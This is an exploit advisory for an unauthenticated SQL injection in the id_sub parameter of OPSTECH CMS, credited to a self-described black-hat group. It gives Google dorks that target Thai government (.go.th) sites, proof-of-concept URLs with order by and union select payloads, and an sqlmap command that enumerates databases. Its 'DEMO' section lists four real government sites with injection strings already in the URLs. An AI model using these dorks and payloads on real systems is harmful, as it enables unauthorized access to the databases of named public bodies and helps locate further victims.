========================================================== [+] Title :- OPSTECH (Open Source Technology) CMS - SQL INJECTION [+] Date :- 6 - Nov - 2018 [+] Vendor Homepage :- http://www.opstech.co.th/ [+] Version :- All Versions [+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows [+] Category :- webapps [+] Google Dorks :- inurl:id_sub= & site:go.th intext:Copyright © 2008 by OPSTECH All Right Reserved. site:go.th [+] Exploit Author :- mr.Gh0st N@0b [+] Team name :- Myanmar Noob Hackers [+] Greedz to :- All Myanmar Black Hats [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id_sub= [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error [+] SQL vulnerable File :- /home/***/domains/XXX.go.th/public_html/core_main/index.php [+] POC :- http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=[SQL]' The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction. http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=221' order by [SQL IN4JECTION]--+ http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=221' union all select [SQL INJECTION]--+ [+] Sqlmap sqlmap -u "http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=221&id_type=1" -p id_sub --dbs --level=3 [+] DEMO :- http://www.janvan.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1 http://www.watsuwan.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1 http://www.nongpluang.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1 http://kohkwang.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1 ======================================================= # mr.Gh0st N@0b [2018-11-6]